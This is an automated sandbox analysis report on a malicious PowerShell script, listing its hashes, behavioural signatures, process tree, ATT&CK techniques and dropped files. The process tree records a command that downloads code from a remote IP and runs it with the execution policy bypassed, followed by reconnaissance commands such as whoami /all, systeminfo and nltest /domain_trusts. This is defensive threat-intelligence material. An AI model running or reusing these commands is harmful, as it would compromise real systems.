Overview

overview

8

Static

static

1

download.dat (1).ps1

windows7-x64

1

download.dat (1).ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2023 08:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    download.dat (1).ps1

  • Size

    3KB

  • MD5

    9f3b3f3c8e27fd5a3b6da453ea05ab64

  • SHA1

    bb091298a548a7e6415908200bcafaa46f4a2a1d

  • SHA256

    e256710a69172b77abe095ad5dc4b7b900f306da16c8a34f994b51d503037c68

  • SHA512

    4b7c7c48589f54132dcbc047a19dc827a2983e9c5c8aa0e5c8d596af05e0e486b7ca2f96d795c197591ba1c27121983d8811be3177bef2492cc3439d143d6661

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\download.dat (1).ps1"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\system32\whoami.exe
      "C:\Windows\system32\whoami.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4620
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbs" "iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe"
        3⤵
          PID:916
        • C:\Windows\system32\systeminfo.exe
          "C:\Windows\system32\systeminfo.exe"
          3⤵
          • Gathers system information
          PID:2488
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe" /all
          3⤵
            PID:1148
          • C:\Windows\system32\nltest.exe
            "C:\Windows\system32\nltest.exe" /domain_trusts
            3⤵
              PID:900
            • C:\Windows\system32\tasklist.exe
              "C:\Windows\system32\tasklist.exe"
              3⤵
              • Enumerates processes with tasklist
              PID:2688
        • C:\Windows\system32\msiexec.exe
          C:\Windows\system32\msiexec.exe /V
          1⤵
            PID:4836
          • C:\Windows\System32\WScript.exe
            C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbs" "iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)"
            1⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3688
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:3852

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Privilege Escalation

          Defense Evasion

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          3
          T1082

          Process Discovery

          1
          T1057

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            b01317fecab417a8f8834d3f321d65b1

            SHA1

            3595feb8be6e1d08eb627a8eb484c9bfbbf04fa0

            SHA256

            d37d947901849c2b0c0c08cb526743a74d2394c361eb4dfc4099a8dd843f0740

            SHA512

            79054366b76191c3c11260472b6a36eebabafd2702933b8250520492a35a49542c9eeb2b3d1aa135357510e57af7c2c1d9427943bdb792724875e7fdbf3a3330

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbs
            Filesize

            106B

            MD5

            29814eb775761c5088028d1907f48c55

            SHA1

            cb369ec71c0a44b9b9411edf956efbb5654ab26e

            SHA256

            ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db

            SHA512

            a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            de04e5ee27689426403ff515cae963a3

            SHA1

            fa602fc72c83017c6d9eaebc492035e6d0d86974

            SHA256

            a62e70b1df753ec520d38c9a0fbfda6e4ea366a70b69da5ea588885429afc133

            SHA512

            b847a6fb8a224c78b6408ffef42c88081269a039915edfbfb4e4e6f5ab1adbbd0bcf5ae30c3169169379e6fdc0f5796f0749818206cd73c3cc4b6b20b4db47f1

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            6084e8c7ac2fac68f21551c50f0d908a

            SHA1

            8559dccbfc9075308eda76c845304dd653347988

            SHA256

            8054e65a47cf3a82d662cf7131949abf443f1962874fec947af9b2ca21ad0572

            SHA512

            1d4894dd8d998cbb3dd81a07680ee55acd7e817ee89954600e908dcc6cb85c5aecb20c6dc05ced5e1b4cd2d2f5d1d9e710bbcaf2720c1f3aa05e00e7ad5c09b8

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq5oorpv.sbc.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit
          • memory/552-165-0x00000289602B0000-0x0000028960472000-memory.dmp
            Filesize

            1.8MB

            Download
          • memory/552-163-0x000002895FBF0000-0x000002895FC00000-memory.dmp
            Filesize

            64KB

            Download
          • memory/552-162-0x000002895FBF0000-0x000002895FC00000-memory.dmp
            Filesize

            64KB

            Download
          • memory/552-164-0x000002895FBF0000-0x000002895FC00000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1908-147-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1908-145-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1908-143-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1908-144-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1908-142-0x0000014AFF3B0000-0x0000014AFF3D2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/3852-177-0x000001FCADE90000-0x000001FCADEA0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/3852-178-0x000001FCADE90000-0x000001FCADEA0000-memory.dmp
            Filesize

            64KB

            Download